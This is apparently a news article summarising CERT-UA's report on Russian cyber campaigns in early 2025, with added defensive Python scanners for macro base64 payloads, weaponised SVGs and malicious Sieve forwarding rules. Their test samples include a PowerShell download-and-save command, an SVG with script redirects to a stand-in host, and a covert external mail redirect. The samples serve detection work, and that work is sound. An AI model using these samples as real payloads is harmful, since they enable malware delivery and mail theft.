Ukraine’s national cyber incident response team (CERT-UA) has released a comprehensive analytical report on Russian cyber operations during the first half of 2025.
According to CERT-UA, the share of attacks against local government bodies rose slightly, from 32% in the second half of 2024 to 34% in the first half of 2025. The defense sector’s share also grew, from 19% to 23%. By contrast, the number of incidents targeting central government institutions and the energy sector decreased, and overall the experts observed a reduction in malware distribution, phishing attempts, and account compromises.
As for active threats, the report details several cyber threat clusters active in early 2025, including groups tracked as UAC-0218, UAC-0219, UAC-0226, and UAC-0227, as well as ongoing campaigns orchestrated by well-known threat actors such as UAC-0001 (associated with APT28) and UAC-0002 (known as Sandworm or APT44), including its subclusters such as UAC-0125.
Experts note a shift in attacker behavior, such as the adoption of the “Steal & Go” tactic, in which malicious scripts are designed to extract data quickly without establishing long-term persistence on the compromised system. According to CERT-UA, it is possible that artificial intelligence was used to generate some of the PowerShell scripts employed in these operations.
In terms of malware tooling, UAC-0219 uses a stealer named ‘WRECKSTEEL’, which chains VBScript and PowerShell scripts to collect files by specific extensions, capture screenshots, and send both to attacker-controlled servers. Campaigns linked to UAC-0218 involve phishing emails carrying password-protected Office documents and encoded scripts that deploy the HOMESTEEL malware, which recursively searches user files and exfiltrates them over HTTP. Archives containing the malicious payloads have been hosted on legitimate Ukrainian file-storage services.
From February 2025, the UAC-0226 cluster began distributing emails with Excel attachments whose macros decode hidden base64-encoded data into executable payloads. The payloads include a reverse shell adapted from a public GitHub repository and a data stealer called ‘GIFTEDCROOK’, which extracts browser histories, saved credentials, and cookies and sends them to attacker-controlled Telegram channels.
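The macro technique described above (long base64 literals in VBA that decode to an executable or an encoded PowerShell command) can be triaged without running the macro. The following is an added example written for this page, not code from the CERT-UA report or from the campaign: it takes VBA source that has already been extracted (for instance with oletools’ `olevba`), rejoins the `" & _` line continuations VBA uses to split long strings, decodes every long base64 run and classifies the result by its leading bytes. The sample macro, the fake PE stub and the PowerShell command are constructed for the example; the length threshold and magic-byte table are assumptions you would tune.

```python
import base64
import binascii
import re

# Base64 runs at least this long are treated as candidate payloads;
# short tokens (keys, GUIDs) are ignored. Assumption: 64 characters.
B64_RUN = re.compile(r"[A-Za-z0-9+/]{64,}={0,2}")
# VBA splits long literals as  "abc" & _ <newline> "def"; rejoin them first
VBA_CONCAT = re.compile(r'"\s*&\s*_\s*\r?\n\s*"')

UTF16_LABEL = "UTF-16LE text (encoded PowerShell style)"
MAGICS = [
    (b"MZ", "PE executable"),
    (b"PK\x03\x04", "ZIP/OOXML container"),
    (b"#!", "script with shebang"),
    (b"\xff\xfe", UTF16_LABEL),
]


def classify(blob):
    """Label a decoded blob by its magic bytes, or None if unrecognised."""
    for magic, label in MAGICS:
        if blob.startswith(magic):
            return label
    # powershell -EncodedCommand takes base64 of UTF-16LE with no BOM:
    # for ASCII text every odd byte is NUL.
    if len(blob) >= 8 and blob[1:8:2] == b"\x00\x00\x00\x00":
        return UTF16_LABEL
    return None


def find_embedded_payloads(vba_source):
    """Return one dict per base64 run that decodes to something executable."""
    joined = VBA_CONCAT.sub("", vba_source)   # offsets below refer to this text
    hits = []
    for m in B64_RUN.finditer(joined):
        try:
            blob = base64.b64decode(m.group(0), validate=True)
        except binascii.Error:
            continue                           # not valid base64 after all
        label = classify(blob)
        if label is None:
            continue
        if label == UTF16_LABEL:
            preview = blob.decode("utf-16-le", errors="replace")[:60]
        else:
            preview = blob[:16].hex()
        hits.append({"offset": m.start(), "size": len(blob),
                     "type": label, "preview": preview})
    return hits


# --- constructed sample, not a real macro from the campaign ---------------
def _b64(data):
    return base64.b64encode(data).decode()

FAKE_PE = b"MZ\x90\x00" + b"\x00" * 60          # PE-looking stub, 64 bytes
ENC_PS = ("Invoke-WebRequest -Uri https://example.invalid/c "
          "-OutFile $env:TEMP\\a.exe").encode("utf-16-le")

SAMPLE_VBA = (
    "Sub AutoOpen()\n"
    "    Dim p As String\n"
    '    p = "' + _b64(FAKE_PE)[:40] + '" & _\n'
    '        "' + _b64(FAKE_PE)[40:] + '"\n'
    "    Dim c As String\n"
    '    c = "' + _b64(ENC_PS) + '"\n'
    "    ' a short token like the one below must not trigger\n"
    '    Dim k As String: k = "dGVzdA=="\n'
    "End Sub\n"
)

if __name__ == "__main__":
    for hit in find_embedded_payloads(SAMPLE_VBA):
        print(hit)
```

The UTF-16 heuristic is what catches the `-EncodedCommand` pattern: the decoded bytes are not a file at all, so a magic-byte table alone would miss them. The check deliberately does not execute or further unpack the payload; a hit is a reason to detonate the document in a sandbox, not a verdict.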
Meanwhile, UAC-0227 has targeted local governments and critical infrastructure using novel delivery methods, including emails with SVG image attachments that contain embedded HTML and JavaScript. Because an SVG file is an XML document rather than a bitmap, opening it in a browser executes the embedded code, which triggers a chain of events ending in the execution of stealers such as AMATERA and STRELA.
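A mail gateway or analyst can tell a harmless SVG icon from a weaponised one by looking for the constructs that make an SVG active. The following scanner is an added example for this page, not code from the CERT-UA report: it parses the attachment as XML and reports `script`, `foreignObject` (the element used to embed HTML), `iframe`/`embed`/`object`, any `on*` event-handler attribute, and `href`/`xlink:href` values with `javascript:`, `vbscript:` or `data:` schemes. The two sample files are constructed for the example; the element and scheme lists are assumptions you may extend.

```python
import re
import xml.etree.ElementTree as ET

# URI schemes that execute code or smuggle content when used in href/xlink:href
ACTIVE_SCHEME = re.compile(r"^\s*(javascript|vbscript|data)\s*:", re.I)
# Elements that carry script or host HTML inside an SVG (assumed list)
ACTIVE_ELEMENTS = {
    "script": "script element",
    "foreignobject": "foreignObject element (embeds HTML)",
    "iframe": "iframe element",
    "embed": "embed element",
    "object": "object element",
}


def _local(name):
    """Strip the '{namespace}' prefix ElementTree puts on tags and attributes."""
    return name.rsplit("}", 1)[-1].lower()


def scan_svg(svg_bytes):
    """Return a list of findings; an empty list means nothing active was found."""
    findings = []
    try:
        root = ET.fromstring(svg_bytes)
    except ET.ParseError as exc:
        # Not even well-formed XML: an image viewer rejects it, but a browser
        # may still try to render it, so treat it as suspect rather than clean.
        return [f"unparseable SVG: {exc}"]
    for el in root.iter():
        name = _local(el.tag)
        if name in ACTIVE_ELEMENTS:
            findings.append(ACTIVE_ELEMENTS[name])
        for attr, value in el.attrib.items():
            a = _local(attr)              # also maps xlink:href -> href
            if a.startswith("on"):        # onload, onerror, onclick, ...
                findings.append(f"event handler {a} on <{name}>")
            elif a == "href" and ACTIVE_SCHEME.match(value):
                scheme = value.strip().split(":", 1)[0].lower()
                findings.append(f"{scheme}: URI in href on <{name}>")
    return findings


def is_suspicious(svg_bytes):
    return bool(scan_svg(svg_bytes))


# --- constructed samples, not real attachments from the campaign ----------
BENIGN_SVG = b"""<?xml version="1.0"?>
<svg xmlns="http://www.w3.org/2000/svg" width="32" height="32">
  <circle cx="16" cy="16" r="12" fill="#0057b8"/>
</svg>"""

MALICIOUS_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg"
     xmlns:xlink="http://www.w3.org/1999/xlink"
     onload="location='https://example.invalid/stage2'">
  <rect width="10" height="10"/>
  <foreignObject width="200" height="100">
    <body xmlns="http://www.w3.org/1999/xhtml">
      <script>document.body.innerHTML = 'Document is loading...'</script>
    </body>
  </foreignObject>
  <a xlink:href="javascript:fetch('https://example.invalid/next')">
    <text>Open document</text>
  </a>
</svg>"""

if __name__ == "__main__":
    print("benign   :", scan_svg(BENIGN_SVG))
    print("malicious:", scan_svg(MALICIOUS_SVG))
```

Note the namespace handling: ElementTree reports `xlink:href` as `{http://www.w3.org/1999/xlink}href`, so a check that compares attribute names literally would miss the `javascript:` link. A policy of blocking any SVG attachment that returns findings (or converting attachments to PNG at the gateway) removes the delivery vector without depending on a signature for a particular stealer.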
CERT-UA also notes that attackers are increasingly using legitimate online services to host and deliver malicious content. Another intrusion method is the active exploitation of “zero-click” vulnerabilities in popular webmail platforms such as Roundcube and Zimbra, where merely viewing a crafted message in the browser is enough to trigger the payload.
Roundcube vulnerabilities such as CVE-2023-43770 (a stored cross-site scripting flaw) allow attackers to embed malicious JavaScript in an email so that it executes in the victim’s webmail session when the message is viewed, enabling them to steal credentials and contacts and to create email forwarding rules that silently intercept communications.
Similarly, Zimbra’s Classic UI has been exploited through flaws in calendar file processing, permitting attackers to run malicious scripts that harvest login data and configure forwarding filters. CERT-UA attributes some campaigns exploiting these vulnerabilities to the UAC-0001 group with a high degree of confidence.
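The lasting effect of both the Roundcube and the Zimbra exploitation described above is a forwarding rule that survives a password reset, so an incident responder wants to audit every mailbox’s filter rules, not just patch the webmail. Both platforms persist user filters as Sieve scripts (Roundcube through its managesieve plugin, Zimbra in the `zimbraMailSieveScript` account attribute). The following is an added example for this page, not code from the CERT-UA report: it parses dumped Sieve scripts, flags `redirect` actions whose target lies outside the organisation’s own domains, and additionally flags the `redirect :copy` plus `discard` combination that hides the forwarded copy from the mailbox owner. The mailbox dump format, the organisation domain and the three sample scripts are constructed assumptions.

```python
import re

# Assumption: the organisation's own mail domains; anything else is "external".
ORG_DOMAINS = {"example.gov.ua"}

# Sieve comments: "# ..." to end of line and /* ... */ blocks.
# (A "#" inside a quoted string would also be stripped; acceptable for triage.)
COMMENT_RE = re.compile(r"#[^\n]*|/\*.*?\*/", re.S)
# redirect [:copy ...] "address";  -- quoted-string form only; the multi-line
# text: string form is not handled by this example.
REDIRECT_RE = re.compile(r'\bredirect\b((?:\s+:\w+)*)\s*"([^"]*)"', re.I)
DISCARD_RE = re.compile(r"\bdiscard\s*;", re.I)


def audit_sieve(script, org_domains=ORG_DOMAINS):
    """Return [(kind, target)] findings for one user's Sieve script."""
    code = COMMENT_RE.sub("", script)
    findings = []
    for m in REDIRECT_RE.finditer(code):
        target = m.group(2).strip()
        domain = target.rsplit("@", 1)[-1].lower() if "@" in target else ""
        if domain not in org_domains:
            findings.append(("external_redirect", target))
    # A discard alongside an external redirect cancels the implicit keep,
    # so the victim never sees the message that was forwarded.
    if findings and DISCARD_RE.search(code):
        findings.append(("discard_after_redirect", None))
    return findings


def audit_dump(scripts, org_domains=ORG_DOMAINS):
    """scripts: {mailbox: sieve_source}. Assumed export format, e.g. the
    managesieve store or 'zmprov ga <user> zimbraMailSieveScript' per account."""
    report = []
    for mailbox, script in scripts.items():
        for kind, target in audit_sieve(script, org_domains):
            report.append((mailbox, kind, target))
    return report


# --- constructed sample dump, not real data ---------------------------------
SAMPLES = {
    "analyst@example.gov.ua": '''
require ["fileinto"];
if header :contains "subject" "weekly report" {
    fileinto "Reports";
}
''',
    "deputy@example.gov.ua": '''
require ["copy"];
# forwarding to a colleague in the same organisation: legitimate
if address :is "from" "minister@example.gov.ua" {
    redirect :copy "assistant@example.gov.ua";
}
''',
    "clerk@example.gov.ua": '''
require ["copy"];
/* rule planted through the webmail UI by injected JavaScript */
if true {
    redirect :copy "collector@mail-relay.invalid";
    discard;
}
''',
}

if __name__ == "__main__":
    for row in audit_dump(SAMPLES):
        print(row)
```

An internal forward is not reported, which keeps the output short enough to review by hand; a stricter variant would also list `:copy` redirects created after a given date, since the exploit plants the rule at the moment the message is viewed and the creation time in the managesieve store or Zimbra audit log narrows down which message carried the payload.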
UAC-0002 (aka Sandworm and APT44) has continued its cyber operations in 2025, focusing on the energy sector, defense industrial organizations, telecommunication providers, and research institutions. CERT-UA notes a correlation between UAC-0002 cyberattacks and kinetic (physical) attacks in the same regions, suggesting coordinated or complementary efforts. One of the most disruptive incidents was a cyberattack on Ukrzaliznytsia, the Ukrainian Railways. While the attack did not halt train operations, it forced several services, including ticket sales, to fall back temporarily to offline procedures. The operation, which CERT-UA describes as essentially terrorist in nature, employed custom malware and delivery methods tailored to the enterprise’s infrastructure.